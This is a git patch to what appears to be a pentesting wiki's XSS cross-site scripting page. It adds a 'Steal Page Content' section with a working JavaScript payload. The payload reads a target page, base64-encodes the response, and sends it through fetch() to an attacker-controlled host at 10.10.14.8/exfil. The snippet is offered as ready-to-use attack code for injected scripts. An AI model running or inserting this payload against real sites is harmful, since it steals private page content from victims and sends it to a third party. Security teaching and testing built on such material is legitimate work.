From 06fbf2469180f97e47019c9a282168105c88302e Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Wed, 1 Sep 2021 23:18:05 +0000
Subject: [PATCH] GitBook: [master] one page modified

---
 pentesting-web/xss-cross-site-scripting/README.md | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index bb0e6c1e..7b392a2e 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -685,6 +685,21 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
 You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies.md#httponly) if you are lucky enough.
 {% endhint %}
 
+### Steal Page Content
+
+```javascript
+var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
+var attacker = "http://10.10.14.8/exfil";
+var xhr  = new XMLHttpRequest();
+xhr.onreadystatechange = function() {
+    if (xhr.readyState == XMLHttpRequest.DONE) {
+        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
+    }
+}
+xhr.open('GET', url, true);
+xhr.send(null);
+```
+
 ### Port Scanner \(fetch\)
 
 ```javascript